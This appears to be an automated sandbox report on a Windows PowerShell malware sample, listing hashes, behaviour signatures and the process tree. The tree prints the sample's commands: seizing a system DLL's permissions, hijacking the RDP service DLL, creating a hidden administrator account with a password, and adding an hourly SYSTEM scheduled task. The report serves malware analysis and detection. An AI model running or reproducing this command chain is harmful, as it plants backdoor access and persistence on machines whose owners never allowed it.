Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2024 02:08
Static task
static1
Behavioral task
behavioral1
Sample
69669d80ee67ca88c2c636c5f4e567ac_JaffaCakes118.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
69669d80ee67ca88c2c636c5f4e567ac_JaffaCakes118.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240419-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
$TEMP/TWUCSTRVZCTWUCSTRVZCTWUCSTRVZC.ps1
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
$TEMP/TWUCSTRVZCTWUCSTRVZCTWUCSTRVZC.ps1
Resource
win10v2004-20240426-en
General
-
Target
$TEMP/TWUCSTRVZCTWUCSTRVZCTWUCSTRVZC.ps1
-
Size
3.5MB
-
MD5
67e1452131ae07c4b67762d3c302f52b
-
SHA1
d6329ac864341d9dd86ff9032df8912ec8c44c8b
-
SHA256
6416923da618a13311012632be2aa383a711c84ee182670e663e4bd8c6464950
-
SHA512
013ee8398189be291970c431be6cab9597e9c3650be44c8842bafeb90e2ac84dc720daf82f24bf67bab4564272fcb34db76b352923697095f9e4b9ed2a553280
-
SSDEEP
49152:RIUxx1Km3fApVfWdmS+KyU053ZBqoBcTq:Y
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exepid process 1640 icacls.exe 4864 icacls.exe 2612 icacls.exe 3948 icacls.exe 1156 icacls.exe 3848 icacls.exe 876 icacls.exe 3840 takeown.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "%SystemRoot%\\help\\tmp5211.dat" reg.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 4264 4264 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 876 icacls.exe 3840 takeown.exe 1640 icacls.exe 4864 icacls.exe 2612 icacls.exe 3948 icacls.exe 1156 icacls.exe 3848 icacls.exe -
Processes:
resource yara_rule C:\Windows\Help\tmp5212.dat upx -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 3 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\help\tmp5212.dat powershell.exe File created C:\Windows\help\tmp5213.dat powershell.exe File created C:\Windows\help\tmp5211.dat powershell.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 648 648 -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeicacls.exedescription pid process Token: SeDebugPrivilege 2684 powershell.exe Token: SeRestorePrivilege 4864 icacls.exe -
Suspicious use of WriteProcessMemory 50 IoCs
Processes:
powershell.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 2684 wrote to memory of 3840 2684 powershell.exe takeown.exe PID 2684 wrote to memory of 3840 2684 powershell.exe takeown.exe PID 2684 wrote to memory of 1640 2684 powershell.exe icacls.exe PID 2684 wrote to memory of 1640 2684 powershell.exe icacls.exe PID 2684 wrote to memory of 4864 2684 powershell.exe icacls.exe PID 2684 wrote to memory of 4864 2684 powershell.exe icacls.exe PID 2684 wrote to memory of 2612 2684 powershell.exe icacls.exe PID 2684 wrote to memory of 2612 2684 powershell.exe icacls.exe PID 2684 wrote to memory of 876 2684 powershell.exe icacls.exe PID 2684 wrote to memory of 876 2684 powershell.exe icacls.exe PID 2684 wrote to memory of 3948 2684 powershell.exe icacls.exe PID 2684 wrote to memory of 3948 2684 powershell.exe icacls.exe PID 2684 wrote to memory of 1156 2684 powershell.exe icacls.exe PID 2684 wrote to memory of 1156 2684 powershell.exe icacls.exe PID 2684 wrote to memory of 3848 2684 powershell.exe icacls.exe PID 2684 wrote to memory of 3848 2684 powershell.exe icacls.exe PID 2684 wrote to memory of 1100 2684 powershell.exe reg.exe PID 2684 wrote to memory of 1100 2684 powershell.exe reg.exe PID 2684 wrote to memory of 4788 2684 powershell.exe reg.exe PID 2684 wrote to memory of 4788 2684 powershell.exe reg.exe PID 2684 wrote to memory of 4936 2684 powershell.exe net.exe PID 2684 wrote to memory of 4936 2684 powershell.exe net.exe PID 4936 wrote to memory of 3444 4936 net.exe net1.exe PID 4936 wrote to memory of 3444 4936 net.exe net1.exe PID 5064 wrote to memory of 4328 5064 cmd.exe net.exe PID 5064 wrote to memory of 4328 5064 cmd.exe net.exe PID 4328 wrote to memory of 2324 4328 net.exe net1.exe PID 4328 wrote to memory of 2324 4328 net.exe net1.exe PID 2680 wrote to memory of 1940 2680 cmd.exe net.exe PID 2680 wrote to memory of 1940 2680 cmd.exe net.exe PID 1940 wrote to memory of 2676 1940 net.exe net1.exe PID 1940 wrote to memory of 2676 1940 net.exe net1.exe PID 2684 wrote to memory of 4864 2684 powershell.exe cmd.exe PID 2684 wrote to memory of 4864 2684 powershell.exe cmd.exe PID 4628 wrote to memory of 2612 4628 cmd.exe net.exe PID 4628 wrote to memory of 2612 4628 cmd.exe net.exe PID 2612 wrote to memory of 1864 2612 net.exe net1.exe PID 2612 wrote to memory of 1864 2612 net.exe net1.exe PID 2684 wrote to memory of 4980 2684 powershell.exe cmd.exe PID 2684 wrote to memory of 4980 2684 powershell.exe cmd.exe PID 3776 wrote to memory of 4700 3776 cmd.exe net.exe PID 3776 wrote to memory of 4700 3776 cmd.exe net.exe PID 4700 wrote to memory of 1408 4700 net.exe net1.exe PID 4700 wrote to memory of 1408 4700 net.exe net1.exe PID 1836 wrote to memory of 5012 1836 cmd.exe net.exe PID 1836 wrote to memory of 5012 1836 cmd.exe net.exe PID 5012 wrote to memory of 544 5012 net.exe net1.exe PID 5012 wrote to memory of 544 5012 net.exe net1.exe PID 1752 wrote to memory of 3332 1752 cmd.exe schtasks.exe PID 1752 wrote to memory of 3332 1752 cmd.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\$TEMP\TWUCSTRVZCTWUCSTRVZCTWUCSTRVZC.ps11⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3840
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1640
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4864
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2612
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:876
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3948
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1156
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3848
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f2⤵PID:1100
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\help\tmp5211.dat /f2⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:4788
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add2⤵
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵PID:3444
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f2⤵PID:4864
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f2⤵PID:4980
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc MzxuaGHm /add1⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc MzxuaGHm /add2⤵
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc MzxuaGHm /add3⤵PID:2324
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:2676
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" LLXDHEWC$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" LLXDHEWC$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" LLXDHEWC$ /ADD3⤵PID:1864
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1408
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc MzxuaGHm1⤵
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc MzxuaGHm2⤵
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc MzxuaGHm3⤵PID:544
-
-
-
C:\Windows\System32\cmd.execmd /C schtasks /create /tn 85829 /tr "powershell -nop -ep bypass -f c:\windows\help\81397.ps1" /ru system /sc hourly /mo 11⤵
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\system32\schtasks.exeschtasks /create /tn 85829 /tr "powershell -nop -ep bypass -f c:\windows\help\81397.ps1" /ru system /sc hourly /mo 12⤵
- Creates scheduled task(s)
PID:3332
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
120KB
MD59a5f1af394cdad5ca5000dc87b664017
SHA197ccaa9535d3f2a0ed259e91b3bb4e7417d50863
SHA256e004b95ba76b4fad388fad96714bf95cd6f2ce8fa3b262d63bf25749dbea8b10
SHA512cc48689ef61b5474291f5a6ac298d30a696950acfffe8208d8965ba7e85cce96b575ebdf0b59d0b764bb35b05404c9a74434eb9b24cd244125a194a02f5dd67a
-
Filesize
783KB
MD59790f9fecc9bf0b6cac0dd2ea51214b8
SHA1257b5af37b30ee374ada8e1a7a4259c5a87503bc
SHA25640c7851445ab77275378d31090f155d856982b0d98c5c2990fbd1b708a371d30
SHA512c8ef15aaabea3a2abfefa3a2bee0d349740009d9f3fcd0ffe145f2004f63dfedaff177c279bba4101f2e9d86944f6b4a371bbc080fa718a28e42be7578bd3bc6
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e